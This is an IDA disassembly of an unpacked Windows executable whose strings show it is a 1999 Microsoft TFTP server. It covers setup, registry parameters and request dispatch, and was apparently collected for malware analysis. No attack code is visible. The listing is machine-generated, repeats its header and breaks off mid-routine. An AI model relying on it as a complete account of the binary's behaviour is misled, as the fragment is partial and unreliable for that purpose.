;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer,	std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer,	std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input	MD5   :	9E78315A6DD243B3A61821463C372612

; File Name   :	u:\work\9e78315a6dd243b3a61821463c372612_unpacked.exe
; Format      :	Portable executable for	80386 (PE)
; Imagebase   :	1000000
; Section 1. (virtual address 00001000)
; Virtual size			: 00003310 (  13072.)
; Section size in file		: 00003310 (  13072.)
; Offset to raw	data for section: 00001000
; Flags	60000020: Text Executable Readable
; Alignment	: default

		include	uni.inc	; see unicode subdir of	ida for	info on	unicode

		.686p
		.mmx
		.model flat

; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Execute
_text		segment	para public 'CODE' use32
		assume cs:_text
		;org 1001000h
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_1001000	dd 77D982ACh	dword_1001004	dd 77D92985h	dword_1001008	dd 77D9858Eh	dword_100100C	dd 77D97D4Dh	dword_1001010	dd 77D92C54h	dword_1001014	dd 77DA9694h						; sub_1001DEB+6Br ...
		dd 0
dword_100101C	dd 77E7B0BBh	dword_1001020	dd 77E74CA6h	dword_1001024	dd 77E7C37Ah	dword_1001028	dd 77F877E0h	dword_100102C	dd 77E7C4E4h						; sub_1002F31+1C3r ...
dword_1001030	dd 77E6670Dh	dword_1001034	dd 77E66F37h	dword_1001038	dd 77E6668Ch						; sub_1001665:loc_1001762r ...
dword_100103C	dd 77E68778h						; sub_1001A91+1ABr
dword_1001040	dd 77E6B217h						; sub_10018DB+B4r ...
dword_1001044	dd 77E68D0Fh						; sub_10019F0+14r ...
dword_1001048	dd 77E65304h	dword_100104C	dd 77F8AA7Dh						; sub_1001A91+B5r ...
dword_1001050	dd 77FC9C41h	dword_1001054	dd 77E6A6C8h						; sub_1001E73+9Er ...
dword_1001058	dd 77F8AA4Ch						; sub_1001A91+4Er ...
dword_100105C	dd 77E74A02h, 77E7E673h, 77FC976Bh, 77E7310Fh					; sub_1001A91+2C1r ...
dword_100106C	dd 77E64B74h						; sub_100205A+4Er
dword_1001070	dd 77F89789h	dword_1001074	dd 77E7CFC6h			dd 0
dword_100107C	dd 78001DEAh	dword_1001080	dd 78003E70h	dword_1001084	dd 7800B426h	dword_1001088	dd 78014EE9h	dword_100108C	dd 78014DABh	dword_1001090	dd 7801D884h	dword_1001094	dd 78001000h						; sub_100205A+93r ...
dword_1001098	dd 78001EC9h	dword_100109C	dd 78012188h	dword_10010A0	dd 780010EDh						; sub_1001F54+47r ...
dword_10010A4	dd 7802A875h						; sub_1001DEB+8r
dword_10010A8	dd 78017A09h	dword_10010AC	dd 7800C9ACh						; sub_10027E1+77r ...
dword_10010B0	dd 78017E4Bh, 78022AA9h					; sub_1001665+1DBr
dword_10010B8	dd 7802A38Bh						; sub_1001DEB+19r
dword_10010BC	dd 78003C1Eh	dword_10010C0	dd 7800F56Ah	dword_10010C4	dd 78003E5Ah	dword_10010C8	dd 78003E64h	dword_10010CC	dd 78003E6Ah	dword_10010D0	dd 7803BB70h	dword_10010D4	dd 78025147h	dword_10010D8	dd 7800BB9Eh	dword_10010DC	dd 7800F7DCh, 7800B908h					; .text:01003B7Ar
dword_10010E4	dd 7801D1CFh						; sub_100333A+1B9r
dword_10010E8	dd 78014B25h	dword_10010EC	dd 7800269Eh						; sub_1001665+C0r ...
		dd 0
dword_10010F4	dd 74FB1311h	dword_10010F8	dd 74FB2B3Ch						; sub_1001A91+12Br ...
dword_10010FC	dd 74FB4A6Ah	dword_1001100	dd 74FB5502h	dword_1001104	dd 74FB2B57h						; sub_100230A+Fr ...
dword_1001108	dd 74FBD027h	dword_100110C	dd 74FB2B57h						; sub_1002A3D+40r ...
; ---------------------------------------------------------------------------

locret_1001110:				; DATA XREF: sub_1001A91+10Fr
		retf
; ---------------------------------------------------------------------------
		db 0ACh, 0FBh, 74h
dword_1001114	dd 74FB125Ah	dword_1001118	dd 74FB894Bh	dword_100111C	dd 74FB3284h						; sub_100205A+E7r ...
dword_1001120	dd 74FB5413h						; sub_1002F31+64r ...
dword_1001124	dd 74FB3A14h						; sub_1002F31+256r ...
dword_1001128	dd 74FB90C0h	dword_100112C	dd 74FB3832h						; sub_100333A+1EBr
dword_1001130	dd 74FB306Fh						; sub_1002A3D+65r ...
		align 8
dword_1001138	dd 77307866h	dword_100113C	dd 773025A3h			dd 0
dword_1001144	dd 77F82A70h	dword_1001148	dd 77F8A557h	dword_100114C	dd 77FB6307h	dword_1001150	dd 77F92A89h						; sub_100333A+95r
dword_1001154	dd 77F97C81h						; sub_1002B5E+114r ...
dword_1001158	dd 77F816E4h						; sub_1002A3D+FDr ...
dword_100115C	dd 77F8F1D6h	dword_1001160	dd 77F9431Dh						; sub_10023D8+F2r
dword_1001164	dd 77F936B1h	dword_1001168	dd 77F912B1h						; sub_1002901+35r
dword_100116C	dd 77F8F73Ch	dword_1001170	dd 77F979C8h	dword_1001174	dd 77F8D7C7h						; sub_10018DB+D6r
dword_1001178	dd 77F975A5h						; sub_1002F31+34Dr ...
		dd 2 dup(0)
		dd 37ECADD7h, 0
		dd 4, 110h, 0
		dd 4C00h, 0
		dd 37ECADD7h, 0
		dd 3, 310h, 0
		dd 4D10h, 0
		dd 37ECADD7h, 0
		dd 6, 2	dup(0)
		dd 5020h, 0
		dd 37ECADD7h, 0
		dd 2, 1Ah, 0
		db 90h
		db 0FEh, 0A7h, 0FFh
aDNtPrivateNetS	db 'D:\nt\private\net\sockets\tcpsvcs\tftpd\tftpd.c built Sep 24 1999'
		db ' 22:17:18',0Ah,0
aOWritableFiles	db ' o writable files keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+C4o
aWritable	db 'writable',0         ; DATA XREF: sub_1001570+BFo
					; sub_10037BF+121o
		align 4
aOReadableFiles	db ' o Readable files keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+B6o
aReadable	db 'readable',0         ; DATA XREF: sub_1001570+B1o
					; sub_10037BF+F1o
		align 4
aOValidmastersK	db ' o ValidMasters   keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+A8o
aMasters	db 'masters',0          ; DATA XREF: sub_1001570+A3o
					; sub_10037BF+C1o
aOValidclientsK	db ' o ValidClients   keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+9Ao
aClients	db 'clients',0          ; DATA XREF: sub_1001570+95o
					; sub_10037BF+8Eo
aTheseKeysAreSh	db 'These keys are shell patterns with * and ? (see examples above):',0Ah
					; DATA XREF: sub_1001570+8Do
		db 0
		align 4
aOStartdirector	db ' o StartDirectory keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+84o
aDirectory	db 'directory',0        ; DATA XREF: sub_1001570+7Fo
					; sub_10037BF+5Co
		align 4
aRegistryKeyNam	db 'Registry key names, all strings: HKEY_LOCAL_MACHINE %s',0Ah,0
					; DATA XREF: sub_1001570+76o
aSystemCurrentc	db 'System\CurrentControlSet\Services\tftpd\parameters',0
					; DATA XREF: sub_1001570+71o
					; sub_10037BF+13o
		align 10h
aTftpd_logfileI	db ' TFTPD_LOGFILE     is %s',0Ah ; DATA XREF: sub_1001570+68o
		db 0Ah,0
		align 4
aTftpd_log	db 'tftpd.log',0        ; DATA XREF: sub_1001570+63o
					; sub_1001665+1D6o
		align 4
aTftpd_default_	db ' TFTPD_DEFAULT_DIR is %s',0Ah,0 ; DATA XREF: sub_1001570+5Ao
		align 4
aTftpdroot	db '\tftpdroot\',0      ; DATA XREF: sub_1001570+55o
					; sub_1003910+1Eo
a?		db '-?',0               ; DATA XREF: sub_1001570+10o
		align 4
aA		db 'a+',0               ; DATA XREF: sub_1001665+1D1o
		align 4
aTftp		db 'tftp',0             ; DATA XREF: sub_100205A+31o
		align 10h
aUdp		db 'udp',0              ; DATA XREF: sub_100205A+2Co
aOptionNegotiat	db 'Option negotiation failure',0 ; DATA XREF: .data:01005CE0o
		align 10h
aNoSuchUser	db 'No such user',0     ; DATA XREF: .data:01005CDCo
		align 10h
aFileAlreadyExi	db 'File already exists',0 ; DATA XREF: .data:01005CD8o
aUnknownTransfe	db 'Unknown transfer ID',0 ; DATA XREF: .data:01005CD4o
aIllegalTftpOpe	db 'Illegal TFTP operation',0 ; DATA XREF: .data:01005CD0o
		align 10h
aDiskFullOrAllo	db 'Disk full or allocation exceeded',0 ; DATA XREF: .data:01005CCCo
		align 4
aAccessViolatio	db 'Access violation',0 ; DATA XREF: .data:01005CC8o
		align 4
aFileNotFound	db 'File not found',0   ; DATA XREF: .data:01005CC4o
		align 4
aErrorUndefined	db 'Error undefined',0  ; DATA XREF: .data:off_1005CC0o
aTsize		db 'tsize',0            ; DATA XREF: sub_10023D8:loc_100251Ao
		align 10h
aTimeout_0	db 'timeout',0          ; DATA XREF: sub_10023D8:loc_1002498o
aBlksize	db 'blksize',0          ; DATA XREF: sub_10023D8+4Eo
aTimeout	db 'Timeout',0          ; DATA XREF: sub_1002A3D+D2o
aInsufficientRe	db 'Insufficient resources',0 ; DATA XREF: sub_1002F31:loc_1003197o
					; sub_100333A+201o ...
		align 10h
aFileNameTooLon	db 'File name too long',0 ; DATA XREF: sub_1002F31+195o
					; sub_100333A+1A0o
		align 4
aMalformedFileN	db 'Malformed file name',0 ; DATA XREF: sub_1002F31+139o
					; sub_100333A+159o
aOctet		db 'octet',0            ; DATA XREF: sub_1002F31+D2o
					; sub_100333A:loc_100341Fo
		align 10h
aNetascii	db 'netascii',0         ; DATA XREF: sub_1002F31+9Fo
					; sub_100333A:loc_10033E1o
		align 4
asc_100155C:				; DATA XREF: sub_1003910+7Fo
		unicode	0, <\>,0
dword_1001560	dd 0FFFFFFFFh, 1003B5Eh, 1003B73h, 0
; =============== S U B	R O U T	I N E =======================================



sub_1001570	proc near		; CODE XREF: .text:01003B4Ap

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		cmp	[esp+arg_0], 1
		push	esi
		jle	loc_1001646
		mov	eax, [esp+4+arg_4]
		mov	esi, offset a?	; "-?"
		mov	eax, [eax+4]


loc_1001588:				; CODE XREF: sub_1001570+34j
		mov	dl, [eax]
		mov	cl, dl
		cmp	dl, [esi]
		jnz	short loc_10015AA
		test	cl, cl
		jz	short loc_10015A6
		mov	dl, [eax+1]
		mov	cl, dl
		cmp	dl, [esi+1]
		jnz	short loc_10015AA
		inc	eax
		inc	eax
		inc	esi
		inc	esi
		test	cl, cl
		jnz	short loc_1001588


loc_10015A6:				; CODE XREF: sub_1001570+22j
		xor	eax, eax
		jmp	short loc_10015AF
; ---------------------------------------------------------------------------


loc_10015AA:				; CODE XREF: sub_1001570+1Ej
					; sub_1001570+2Cj
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh


loc_10015AF:				; CODE XREF: sub_1001570+38j
		test	eax, eax
		jnz	loc_1001646
		mov	esi, ds:dword_10010D4
		push	offset asc_1005010 ; " ======================================"...
		call	esi ; dword_10010D4
		pop	ecx
		push	offset aTftpdroot ; "\\tftpdroot\\"
		push	offset aTftpd_default_ ; " TFTPD_DEFAULT_DIR is	%s\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aTftpd_log ; "tftpd.log"
		push	offset aTftpd_logfileI ; " TFTPD_LOGFILE     is	%s\n\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aSystemCurrentc ; "System\\CurrentControlSet\\Services\\tftpd"...
		push	offset aRegistryKeyNam ; "Registry key names, all strings: HKEY_L"...
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aDirectory ; "directory"
		push	offset aOStartdirector ; " o StartDirectory keyname \"%s\"\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aTheseKeysAreSh ; "These	keys are shell patterns	with * an"...
		call	esi ; dword_10010D4
		pop	ecx
		push	offset aClients	; "clients"
		push	offset aOValidclientsK ; " o ValidClients   keyname \"%s\"\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aMasters	; "masters"
		push	offset aOValidmastersK ; " o ValidMasters   keyname \"%s\"\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aReadable ; "readable"
		push	offset aOReadableFiles ; " o Readable files keyname \"%s\"\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aWritable ; "writable"
		push	offset aOWritableFiles ; " o writable files keyname \"%s\"\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	0FFFFFFFFh
		call	ds:dword_10010EC
		pop	ecx


loc_1001646:				; CODE XREF: sub_1001570+6j
					; sub_1001570+41j
		push	offset off_1005CB0
		call	ds:dword_1001004
		test	eax, eax
		jnz	short loc_100165B
		call	ds:dword_1001038


loc_100165B:				; CODE XREF: sub_1001570+E3j
		push	0
		call	ds:dword_100101C
		pop	esi
		retn
sub_1001570	endp


; =============== S U B	R O U T	I N E =======================================



sub_1001665	proc near		; DATA XREF: .data:01005CB4o

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	ebx
		push	ebp
		push	esi
		push	edi
		xor	ebp, ebp
		push	offset sub_1001DEB
		push	offset aTftpd	; "Tftpd"
		mov	dword_1006120, 30h
		mov	dword_1006124, 2
		mov	dword_1006128, ebp
		mov	dword_1006134, 1
		mov	dword_1006138, 4E20h
		mov	dword_100612C, ebp
		mov	dword_1006130, ebp
		call	ds:dword_1001010
		cmp	eax, ebp
		mov	dword_1006044, eax
		jz	loc_1001762
		mov	esi, ds:dword_1001014
		mov	edi, offset dword_1006120
		push	edi
		push	eax
		call	esi ; dword_1001014
		cmp	eax, ebp
		jz	loc_1001762
		mov	ebx, ds:dword_1001040
		push	ebp
		push	ebp
		push	ebp
		push	ebp
		call	ebx ; dword_1001040
		push	ebp
		push	ebp
		push	ebp
		push	ebp
		mov	dword_1005DDC, eax
		call	ebx ; dword_1001040
		cmp	dword_1005DDC, ebp
		mov	dword_1005DE0, eax
		jz	short loc_100171C
		cmp	eax, ebp
		jz	short loc_100171C
		push	offset dword_1006140
		push	101h
		call	ds:dword_10010FC
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_1001735
		call	ds:dword_10010F8


loc_100171C:				; CODE XREF: sub_1001665+96j
					; sub_1001665+9Aj ...
		push	1Fh
		call	sub_1001E73
		push	1
		call	ds:dword_10010EC
		pop	ecx


loc_100172C:				; CODE XREF: sub_1001665+218j
					; sub_1001665+224j
		pop	edi
		pop	esi
		pop	ebp
		xor	eax, eax
		pop	ebx
		retn	8
; ---------------------------------------------------------------------------


loc_1001735:				; CODE XREF: sub_1001665+AFj
		push	edi
		mov	dword_1006124, 4
		push	dword_1006044
		mov	dword_1006128, 7
		mov	dword_1006134, ebp
		mov	dword_1006138, ebp
		call	esi ; dword_1001014
		cmp	eax, ebp
		jnz	short loc_100176A


loc_1001762:				; CODE XREF: sub_1001665+57j
					; sub_1001665+6Ej
		call	ds:dword_1001038
		jmp	short loc_100171C
; ---------------------------------------------------------------------------


loc_100176A:				; CODE XREF: sub_1001665+FBj
		push	9
		pop	ecx
		xor	eax, eax
		mov	edx, offset dword_10060C0
		mov	edi, edx
		rep stosd
		push	edx
		call	ds:dword_10010A4
		pop	ecx
		mov	edx, [esp+10h+arg_0]
		dec	edx
		mov	ebx, (offset dword_1005E07+1)
		jz	short loc_10017F3
		mov	eax, [esp+10h+arg_4]
		lea	eax, [eax+edx*4]
		mov	[esp+10h+arg_0], eax


loc_1001797:				; CODE XREF: sub_1001665+18Cj
		mov	eax, [esp+10h+arg_0]
		mov	eax, [eax]
		cmp	byte ptr [eax],	2Dh
		jnz	short loc_10017F3
		movsx	ecx, byte ptr [eax+1]
		sub	ecx, 64h
		jz	short loc_10017C9
		dec	ecx
		jz	short loc_10017BD
		dec	ecx
		jnz	short loc_10017E9
		mov	dword_1005DD8, 1
		jmp	short loc_10017E9
; ---------------------------------------------------------------------------


loc_10017BD:				; CODE XREF: sub_1001665+147j
		mov	dword_1005DD4, 1
		jmp	short loc_10017E9
; ---------------------------------------------------------------------------


loc_10017C9:				; CODE XREF: sub_1001665+144j
		lea	edi, [eax+2]
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		repne scasb
		not	ecx
		sub	edi, ecx
		mov	eax, ecx
		mov	esi, edi
		mov	edi, ebx
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb


loc_10017E9:				; CODE XREF: sub_1001665+14Aj
					; sub_1001665+156j ...
		sub	[esp+10h+arg_0], 4
		dec	edx
		cmp	edx, ebp
		ja	short loc_1001797


loc_10017F3:				; CODE XREF: sub_1001665+125j
					; sub_1001665+13Bj
		call	sub_10037BF
		call	sub_1003910
		mov	esi, ds:dword_10010A8
		push	ebx
		call	esi ; dword_10010A8
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jnz	short loc_100182E
		call	ds:dword_10010AC
		push	ebx
		call	ds:dword_10010B0
		cmp	eax, ebp
		pop	ecx
		jnz	loc_100171C
		push	ebx
		call	esi ; dword_10010A8
		cmp	eax, ebp
		pop	ecx
		jnz	loc_100171C


loc_100182E:				; CODE XREF: sub_1001665+1A5j
		cmp	dword_1005DD8, ebp
		jz	short loc_1001857
		push	offset aA	; "a+"
		push	offset aTftpd_log ; "tftpd.log"
		call	ds:dword_10010B0+4
		pop	ecx
		cmp	eax, ebp
		pop	ecx
		mov	dword_1005DD0, eax
		jnz	short loc_1001857
		mov	dword_1005DD8, ebp


loc_1001857:				; CODE XREF: sub_1001665+1CFj
					; sub_1001665+1EAj
		push	offset dword_10060C0
		call	ds:dword_10010B8
		pop	ecx
		call	sub_10018DB
		call	sub_10019F0
		push	0FFFFFFFFh
		push	dword_1005DDC
		call	ds:dword_100103C
		cmp	eax, ebp
		jz	loc_100172C
		call	ds:dword_1001038
		jmp	loc_100172C
sub_1001665	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_100188E	proc near		; CODE XREF: sub_100205A+D5p
					; sub_1002F31+2A8p ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= byte ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	3
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	ds:dword_1001100
		test	eax, eax
		jz	short loc_10018AE
		call	ds:dword_1001038
		xor	eax, eax
		jmp	short locret_10018D7
; ---------------------------------------------------------------------------


loc_10018AE:				; CODE XREF: sub_100188E+14j
		test	[ebp+arg_8], 1
		push	0
		push	0FFFFFFFFh
		push	[ebp+arg_0]
		jz	short loc_10018C2
		push	offset loc_1001D74
		jmp	short loc_10018C7
; ---------------------------------------------------------------------------


loc_10018C2:				; CODE XREF: sub_100188E+2Bj
		push	offset loc_1001DDB


loc_10018C7:				; CODE XREF: sub_100188E+32j
		push	[ebp+arg_4]
		lea	eax, [ebp+var_4]
		push	eax
		call	ds:dword_1001174
		mov	eax, [ebp+var_4]

locret_10018D7:				; CODE XREF: sub_100188E+1Ej
		leave
		retn	0Ch
sub_100188E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_10018DB	proc near		; CODE XREF: sub_1001665+1FEp

var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		push	esi
		mov	esi, ds:dword_1001044
		push	edi
		push	offset dword_1006080
		call	esi ; dword_1001044
		push	offset dword_1006020
		call	esi ; dword_1001044
		mov	eax, offset dword_1006098
		mov	dword_100609C, eax
		mov	dword_1006098, eax
		mov	eax, offset dword_1006038
		mov	dword_100603C, eax
		mov	dword_1006038, eax
		lea	eax, [ebp+var_4]
		push	eax
		call	sub_1001FA6
		xor	esi, esi
		test	eax, eax
		jnz	short loc_1001957
		mov	eax, [ebp+var_4]
		xor	ebx, ebx
		cmp	[eax], esi
		jbe	short loc_100194F
		xor	edi, edi


loc_100192E:				; CODE XREF: sub_10018DB+72j
		mov	ecx, [eax+edi+4]
		cmp	ecx, esi
		jz	short loc_1001947
		cmp	ecx, 100007Fh
		jz	short loc_1001947
		push	ecx
		call	sub_100205A
		mov	eax, [ebp+var_4]


loc_1001947:				; CODE XREF: sub_10018DB+59j
					; sub_10018DB+61j
		inc	ebx
		add	edi, 18h
		cmp	ebx, [eax]
		jb	short loc_100192E


loc_100194F:				; CODE XREF: sub_10018DB+4Fj
		push	eax
		call	ds:dword_10010A0
		pop	ecx


loc_1001957:				; CODE XREF: sub_10018DB+46j
		push	offset dword_10060A0
		call	ds:dword_1001170
		cmp	eax, esi
		jnz	loc_10019EB
		mov	eax, 0EA60h
		push	esi
		push	eax
		push	eax
		push	esi
		push	offset sub_10029BA
		push	offset dword_1006048
		push	dword_10060A0
		call	ds:dword_1001178
		push	esi
		push	esi
		push	esi
		push	esi
		mov	edi, eax
		call	ds:dword_1001040
		cmp	eax, esi
		mov	dword_1005DF8, eax
		jnz	short loc_10019A2
		mov	eax, edi
		jmp	short loc_10019EB
; ---------------------------------------------------------------------------


loc_10019A2:				; CODE XREF: sub_10018DB+C1j
		push	esi
		push	0FFFFFFFFh
		push	esi
		push	offset sub_1002219
		push	eax
		push	offset dword_1005DFC
		call	ds:dword_1001174
		cmp	eax, esi
		jnz	short loc_10019EB
		mov	ecx, offset dword_1006100
		xor	eax, eax
		mov	edi, ecx
		push	ecx
		stosd
		stosd
		stosd
		stosd
		stosd
		mov	eax, dword_1005DF8
		push	offset dword_1005E00
		mov	dword_1006110, eax
		call	sub_1003A44
		cmp	eax, esi
		jz	short loc_10019E9
		cmp	eax, 3E5h
		jnz	short loc_10019EB


loc_10019E9:				; CODE XREF: sub_10018DB+105j
		xor	eax, eax


loc_10019EB:				; CODE XREF: sub_10018DB+89j
					; sub_10018DB+C5j ...
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_10018DB	endp


; =============== S U B	R O U T	I N E =======================================



sub_10019F0	proc near		; CODE XREF: sub_1001665+203p
		mov	eax, offset dword_1006078
		push	offset dword_1006060
		mov	dword_100607C, eax
		mov	dword_1006078, eax
		call	ds:dword_1001044
		push	0
		push	0EFD1Ch
		push	0
		call	ds:dword_1001048
		mov	dword_1005DEC, eax
		retn
sub_10019F0	endp


; =============== S U B	R O U T	I N E =======================================



sub_1001A1F	proc near		; CODE XREF: sub_10029BA+79p
		push	ebx
		push	esi
		mov	ebx, offset dword_1006060
		push	edi
		push	ebx
		xor	esi, esi
		call	ds:dword_1001058
		mov	eax, dword_1005DF0
		sub	eax, dword_1005DF4
		cmp	eax, 0Ah
		jbe	short loc_1001A46
		shr	eax, 1
		mov	esi, eax
		jmp	short loc_1001A4E
; ---------------------------------------------------------------------------


loc_1001A46:				; CODE XREF: sub_1001A1F+1Fj
		cmp	eax, 3
		jbe	short loc_1001A4E
		push	2
		pop	esi


loc_1001A4E:				; CODE XREF: sub_1001A1F+25j
					; sub_1001A1F+2Aj
		test	esi, esi
		jbe	short loc_1001A86
		mov	edi, esi


loc_1001A54:				; CODE XREF: sub_1001A1F+65j
		mov	eax, dword_1006078
		mov	esi, eax
		mov	ecx, [eax]
		mov	eax, [eax+4]
		mov	[eax], ecx
		mov	[ecx+4], eax
		push	dword ptr [esi+30h]
		call	ds:dword_1001054
		push	esi
		push	0
		push	dword_1005DEC
		call	ds:dword_1001050
		dec	dword_1005DF0
		dec	edi
		jnz	short loc_1001A54


loc_1001A86:				; CODE XREF: sub_1001A1F+31j
		push	ebx
		call	ds:dword_100104C
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_1001A1F	endp


; =============== S U B	R O U T	I N E =======================================



sub_1001A91	proc near		; CODE XREF: .text:01001DCCp
					; .text:01001DE1p

var_68		= byte ptr -68h
var_4C		= dword	ptr -4Ch
var_48		= dword	ptr -48h
var_40		= dword	ptr -40h
var_3C		= dword	ptr -3Ch
var_30		= byte ptr -30h
var_28		= dword	ptr -28h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_10		= byte ptr -10h
var_8		= dword	ptr -8
arg_0		= dword	ptr  4
arg_10		= byte ptr  14h
arg_FF9C	= dword	ptr  0FFA0h
arg_FFA0	= dword	ptr  0FFA4h
arg_FFA4	= dword	ptr  0FFA8h
arg_FFA8	= dword	ptr  0FFACh
arg_FFD4	= dword	ptr  0FFD8h
arg_FFD8	= dword	ptr  0FFDCh
arg_10004	= dword	ptr  10008h

		mov	eax, 10004h
		call	sub_1003A3E
		push	ebx
		push	ebp
		xor	ebp, ebp
		push	esi
		push	edi
		mov	[esp+10h], ebp
		mov	ebx, offset dword_1006060


loc_1001AAA:				; CODE XREF: sub_1001A91+291j
		lea	eax, [esp+10h+arg_0]
		push	eax
		push	4004667Fh
		push	[esp+18h+arg_10004]
		call	ds:dword_1001114
		cmp	eax, ebp
		jnz	loc_1001D27
		cmp	[esp+1Ch+var_8], ebp
		jz	loc_1001D65
		xor	eax, eax
		lea	edi, [esp+1Ch+arg_10]
		stosd
		stosd
		stosd
		stosd
		push	ebx
		stosd
		call	ds:dword_1001058
		mov	eax, dword_1006078
		inc	dword_1005DF4
		cmp	eax, offset dword_1006078
		jz	short loc_1001B11
		mov	ecx, [eax]
		mov	esi, eax
		mov	eax, [eax+4]
		mov	[eax], ecx
		mov	[ecx+4], eax
		push	dword ptr [esi+30h]
		call	ds:dword_100105C+0Ch
		mov	eax, [esi+30h]
		jmp	short loc_1001B41
; ---------------------------------------------------------------------------


loc_1001B11:				; CODE XREF: sub_1001A91+64j
		inc	dword_1005DF0
		push	2FF6Ch
		push	8
		push	dword_1005DEC
		call	ds:dword_100105C+8
		mov	esi, eax
		cmp	esi, ebp
		jz	loc_1001D5E
		push	ebp
		push	ebp
		push	ebp
		push	ebp
		call	ds:dword_1001040
		mov	[esi+30h], eax


loc_1001B41:				; CODE XREF: sub_1001A91+7Ej
		push	ebx
		mov	[esp+40h+arg_0], eax
		call	ds:dword_100104C
		lea	ebp, [esi+34h]
		mov	ecx, 3FEFh
		xor	eax, eax
		mov	edi, ebp
		rep stosd
		stosb
		mov	eax, [esp+40h+arg_FFD8]
		mov	[esp+40h+var_1C], ebp
		mov	[esp+40h+var_20], 0FFBDh
		mov	[esp+40h+var_28], 10h
		mov	[esi+1Ch], eax
		lea	eax, [esp+40h+var_10]
		push	0
		push	eax
		lea	eax, [esp+48h+var_28]
		lea	edi, [esi+2Ch]
		push	eax
		lea	eax, [esi+0Ch]
		push	eax
		lea	eax, [esp+50h+var_30]
		push	eax
		push	edi
		lea	eax, [esp+58h+var_20]
		push	1
		push	eax
		push	[esp+60h+arg_FFD4]
		call	dword ptr ds:locret_1001110
		mov	[esp+64h+var_48], eax
		mov	ax, [esi+0Eh]
		push	eax
		call	ds:dword_100110C
		cmp	[esp+68h+var_4C], 0
		jz	short loc_1001C34
		call	ds:dword_10010F8
		cmp	eax, 3E5h
		jnz	loc_1001D2F
		mov	eax, dword_1005DDC
		push	0FFFFFFFFh
		mov	[esp+6Ch+var_40], eax
		mov	eax, [esp+6Ch+var_28]
		mov	[esp+6Ch+var_3C], eax
		lea	eax, [esp+6Ch+var_40]
		push	0
		push	eax
		push	2
		call	ds:dword_100105C+4
		cmp	eax, 0FFFFFFFFh
		jz	loc_1001D2F
		cmp	eax, 102h
		jz	loc_1001D2F
		test	eax, eax
		jz	loc_1001D2F
		lea	eax, [esp+78h+var_68]
		push	eax
		push	0
		lea	eax, [esp+80h+var_48]
		push	edi
		push	eax
		push	[esp+88h+arg_FF9C]
		call	ds:dword_1001108
		test	eax, eax
		jnz	short loc_1001C34
		call	ds:dword_10010F8
		jmp	loc_1001CEA
; ---------------------------------------------------------------------------


loc_1001C34:				; CODE XREF: sub_1001A91+129j
					; sub_1001A91+196j
		push	0
		push	dword_1005DDC
		call	ds:dword_100103C
		test	eax, eax
		jz	loc_1001D2F
		cmp	dword ptr [edi], 2
		jl	loc_1001CEA
		xor	edi, edi
		cmp	[esp+70h+arg_FFA8], edi
		jz	short loc_1001CDA
		mov	ax, [ebp+0]
		push	eax
		call	ds:dword_1001104
		movzx	ecx, ax
		test	ecx, ecx
		jle	short loc_1001CB8
		cmp	ecx, 2
		jle	short loc_1001C81
		cmp	ecx, 4
		jz	short loc_1001CB8
		cmp	ecx, 5
		jnz	short loc_1001CB8
		jmp	short loc_1001CEA
; ---------------------------------------------------------------------------


loc_1001C81:				; CODE XREF: sub_1001A91+1E2j
		cmp	ax, 1
		jnz	short loc_1001C94
		inc	dword_10060C4
		mov	edi, offset sub_1002F31
		jmp	short loc_1001CA5
; ---------------------------------------------------------------------------


loc_1001C94:				; CODE XREF: sub_1001A91+1F4j
		cmp	ax, 2
		jnz	short loc_1001CA5
		inc	dword_10060C8
		mov	edi, offset sub_100333A


loc_1001CA5:				; CODE XREF: sub_1001A91+201j
					; sub_1001A91+207j
		mov	eax, [esp+74h+arg_FFA0]
		test	edi, edi
		mov	[esi+8], eax
		jz	short loc_1001CEA
		push	esi
		call	edi ; sub_1002F31
		jmp	short loc_1001CEA
; ---------------------------------------------------------------------------


loc_1001CB8:				; CODE XREF: sub_1001A91+1DDj
					; sub_1001A91+1E7j ...
		push	0
		push	4
		push	[esp+7Ch+arg_FFA0]
		inc	dword_10060CC
		lea	eax, [esp+80h+var_20]
		push	eax
		lea	eax, [esp+84h+var_30]
		push	eax
		call	sub_100230A
